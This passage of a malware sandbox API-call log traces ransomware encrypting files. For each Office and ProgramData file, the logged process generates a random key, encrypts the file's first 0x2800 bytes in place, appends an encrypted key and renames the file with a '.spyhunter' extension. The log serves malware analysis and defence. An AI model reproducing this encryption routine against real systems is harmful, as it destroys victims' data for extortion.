lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f474, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f474*=0x30, lpOverlapped=0x0) returned 1 [0128.778] CloseHandle (hObject=0x170) returned 1 [0128.778] GetProcessHeap () returned 0x2c0000 [0128.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f28720 [0128.778] wnsprintfW (in: pszDest=0x2f28720, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL.spyhunter") returned 74 [0128.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewer.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewer.dll.spyhunter")) returned 1 [0128.779] GetProcessHeap () returned 0x2c0000 [0128.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28720 | out: hHeap=0x2c0000) returned 1 [0128.779] GetProcessHeap () returned 0x2c0000 [0128.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0128.779] GetProcessHeap () returned 0x2c0000 [0128.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06328 | out: hHeap=0x2c0000) returned 1 [0128.821] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4b0 | out: pbBuffer=0x270f4b0) returned 1 [0128.821] GetProcessHeap () returned 0x2c0000 [0128.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0128.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f4a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f4a8*=0x30) returned 1 [0128.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\currency.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0128.822] GetProcessHeap () returned 0x2c0000 [0128.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0128.822] GetProcessHeap () returned 0x2c0000 [0128.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87908 | out: hHeap=0x2c0000) returned 1 [0129.041] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4a0 | out: pbBuffer=0x270f4a0) returned 1 [0129.041] GetProcessHeap () returned 0x2c0000 [0129.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.041] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f498*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f498*=0x30) returned 1 [0129.041] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0129.042] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0129.042] StrStrW (lpFirst="qmgr1.dat", lpSrch=".txt") returned 0x0 [0129.042] GetProcessHeap () returned 0x2c0000 [0129.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.042] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f45c*=0x2800, lpOverlapped=0x0) returned 1 [0129.243] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.243] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f45c*=0x2800, lpOverlapped=0x0) returned 1 [0129.243] GetProcessHeap () returned 0x2c0000 [0129.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.243] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.244] WriteFile (in: hFile=0xf0, lpBuffer=0x270f49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f45c, lpOverlapped=0x0 | out: lpBuffer=0x270f49c*, lpNumberOfBytesWritten=0x270f45c*=0x4, lpOverlapped=0x0) returned 1 [0129.245] WriteFile (in: hFile=0xf0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f45c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f45c*=0x30, lpOverlapped=0x0) returned 1 [0129.245] CloseHandle (hObject=0xf0) returned 1 [0129.245] GetProcessHeap () returned 0x2c0000 [0129.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.245] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.spyhunter") returned 67 [0129.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.spyhunter" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat.spyhunter")) returned 1 [0129.246] GetProcessHeap () returned 0x2c0000 [0129.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.246] GetProcessHeap () returned 0x2c0000 [0129.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.246] GetProcessHeap () returned 0x2c0000 [0129.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9a78 | out: hHeap=0x2c0000) returned 1 [0129.246] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4a0 | out: pbBuffer=0x270f4a0) returned 1 [0129.246] GetProcessHeap () returned 0x2c0000 [0129.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.246] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f498*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f498*=0x30) returned 1 [0129.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0129.247] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0129.247] StrStrW (lpFirst="MySite.ico", lpSrch=".txt") returned 0x0 [0129.247] GetProcessHeap () returned 0x2c0000 [0129.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.247] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f45c*=0x2800, lpOverlapped=0x0) returned 1 [0129.259] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.260] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f45c*=0x2800, lpOverlapped=0x0) returned 1 [0129.260] GetProcessHeap () returned 0x2c0000 [0129.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.260] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.260] WriteFile (in: hFile=0xf0, lpBuffer=0x270f49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f45c, lpOverlapped=0x0 | out: lpBuffer=0x270f49c*, lpNumberOfBytesWritten=0x270f45c*=0x4, lpOverlapped=0x0) returned 1 [0129.314] WriteFile (in: hFile=0xf0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f45c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f45c*=0x30, lpOverlapped=0x0) returned 1 [0129.315] CloseHandle (hObject=0xf0) returned 1 [0129.315] GetProcessHeap () returned 0x2c0000 [0129.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.315] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.spyhunter") returned 56 [0129.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico.spyhunter")) returned 1 [0129.315] GetProcessHeap () returned 0x2c0000 [0129.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.315] GetProcessHeap () returned 0x2c0000 [0129.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.315] GetProcessHeap () returned 0x2c0000 [0129.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ddc8 | out: hHeap=0x2c0000) returned 1 [0129.316] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f498 | out: pbBuffer=0x270f498) returned 1 [0129.316] GetProcessHeap () returned 0x2c0000 [0129.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.316] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f490*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f490*=0x30) returned 1 [0129.316] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.320] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0129.320] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0129.320] GetProcessHeap () returned 0x2c0000 [0129.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.320] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f454, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f454*=0x2800, lpOverlapped=0x0) returned 1 [0129.322] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.322] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f454, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f454*=0x2800, lpOverlapped=0x0) returned 1 [0129.322] GetProcessHeap () returned 0x2c0000 [0129.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.322] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.322] WriteFile (in: hFile=0x17c, lpBuffer=0x270f494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f454, lpOverlapped=0x0 | out: lpBuffer=0x270f494*, lpNumberOfBytesWritten=0x270f454*=0x4, lpOverlapped=0x0) returned 1 [0129.326] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f454, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f454*=0x30, lpOverlapped=0x0) returned 1 [0129.326] CloseHandle (hObject=0x17c) returned 1 [0129.326] GetProcessHeap () returned 0x2c0000 [0129.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.326] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.spyhunter") returned 82 [0129.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll.spyhunter")) returned 1 [0129.327] GetProcessHeap () returned 0x2c0000 [0129.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.327] GetProcessHeap () returned 0x2c0000 [0129.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.327] GetProcessHeap () returned 0x2c0000 [0129.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3cf8 | out: hHeap=0x2c0000) returned 1 [0129.327] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f498 | out: pbBuffer=0x270f498) returned 1 [0129.327] GetProcessHeap () returned 0x2c0000 [0129.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.327] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f490*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f490*=0x30) returned 1 [0129.327] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.327] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0129.327] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0129.327] GetProcessHeap () returned 0x2c0000 [0129.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.328] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f454, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f454*=0x2800, lpOverlapped=0x0) returned 1 [0129.335] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.335] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f454, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f454*=0x2800, lpOverlapped=0x0) returned 1 [0129.335] GetProcessHeap () returned 0x2c0000 [0129.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.335] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.335] WriteFile (in: hFile=0x17c, lpBuffer=0x270f494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f454, lpOverlapped=0x0 | out: lpBuffer=0x270f494*, lpNumberOfBytesWritten=0x270f454*=0x4, lpOverlapped=0x0) returned 1 [0129.336] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f454, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f454*=0x30, lpOverlapped=0x0) returned 1 [0129.336] CloseHandle (hObject=0x17c) returned 1 [0129.336] GetProcessHeap () returned 0x2c0000 [0129.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.336] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.spyhunter") returned 80 [0129.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll.spyhunter")) returned 1 [0129.337] GetProcessHeap () returned 0x2c0000 [0129.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.337] GetProcessHeap () returned 0x2c0000 [0129.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.338] GetProcessHeap () returned 0x2c0000 [0129.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7fcc8 | out: hHeap=0x2c0000) returned 1 [0129.338] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f490 | out: pbBuffer=0x270f490) returned 1 [0129.338] GetProcessHeap () returned 0x2c0000 [0129.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.338] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f488*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f488*=0x30) returned 1 [0129.338] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.339] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned 72 [0129.339] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0129.339] GetProcessHeap () returned 0x2c0000 [0129.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.339] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f44c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f44c*=0x2800, lpOverlapped=0x0) returned 1 [0129.340] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.341] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f44c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f44c*=0x2800, lpOverlapped=0x0) returned 1 [0129.341] GetProcessHeap () returned 0x2c0000 [0129.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.341] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.341] WriteFile (in: hFile=0x17c, lpBuffer=0x270f48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f44c, lpOverlapped=0x0 | out: lpBuffer=0x270f48c*, lpNumberOfBytesWritten=0x270f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.342] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f44c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f44c*=0x30, lpOverlapped=0x0) returned 1 [0129.342] CloseHandle (hObject=0x17c) returned 1 [0129.342] GetProcessHeap () returned 0x2c0000 [0129.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0129.342] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.spyhunter") returned 82 [0129.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll.spyhunter")) returned 1 [0129.343] GetProcessHeap () returned 0x2c0000 [0129.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0129.343] GetProcessHeap () returned 0x2c0000 [0129.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.343] GetProcessHeap () returned 0x2c0000 [0129.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4938 | out: hHeap=0x2c0000) returned 1 [0129.346] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f480 | out: pbBuffer=0x270f480) returned 1 [0129.346] GetProcessHeap () returned 0x2c0000 [0129.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.346] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f478*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f478*=0x30) returned 1 [0129.346] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.347] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0129.347] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0129.347] GetProcessHeap () returned 0x2c0000 [0129.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.347] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f43c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f43c*=0x2800, lpOverlapped=0x0) returned 1 [0129.351] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.351] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f43c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f43c*=0x2800, lpOverlapped=0x0) returned 1 [0129.351] GetProcessHeap () returned 0x2c0000 [0129.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.351] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.351] WriteFile (in: hFile=0x17c, lpBuffer=0x270f47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f43c, lpOverlapped=0x0 | out: lpBuffer=0x270f47c*, lpNumberOfBytesWritten=0x270f43c*=0x4, lpOverlapped=0x0) returned 1 [0129.389] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f43c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f43c*=0x30, lpOverlapped=0x0) returned 1 [0129.389] CloseHandle (hObject=0x17c) returned 1 [0129.554] GetProcessHeap () returned 0x2c0000 [0129.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.554] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: 